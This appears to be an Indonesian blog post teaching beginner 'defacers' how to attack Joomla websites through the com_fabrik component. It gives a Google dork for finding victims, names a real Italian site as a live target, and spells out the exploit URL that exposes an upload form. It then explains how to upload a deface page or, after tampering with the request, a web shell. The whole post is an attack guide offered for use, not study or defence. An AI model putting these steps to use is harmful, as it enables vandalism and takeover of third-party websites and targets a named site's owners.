Tehnik Com_fabric merupakan teknik lama untuk men deface suatu website namun sampai sekarang teknik deface ini masih menjadi santapan-santapan para defacer pemula/newbie,dikarenakan teknik ini sangat mudah untuk di lakukan dan sangat cocok untuk yang lagi belajar untuk membugili sebuah website :D ,Oke gak usah lama-lama,langsung aja ke TKP ^_^
Step By Step nya:
1.Cari target dengan dork
inurl:viewTable?cid= site:it (bisa anda kembangin sendiri) baca juga Cara Mengembangkan Google Dork
live target: www.decanatodibrivio.it
2.Setelah menemukan target masukkan exploit di belakang URL korban :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3.sehinnga nanti akan menjadi
www.decanatodibrivio.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4.setelah itu tekan enter maka akan muncul kotak upload seperti di bawah,tinggal browse dan klik import CSV untuk mengupload script :D
5.Jika muncul bacaan seperti di bawah,berarti script succes di upload :D
6.Terakhir,tinggal panggil scriptnya di www.target.com/media/nama_script_anda.html.
contoh punya saya :D
NB:Dapat juga mengupload shell,tetapi shell yang mau di upload harus di tamper dulu menggunakan tamper data
Sekian coretan kecil dari saya
Semoga Bermanfaat ^_^
Tidak ada komentar:
Posting Komentar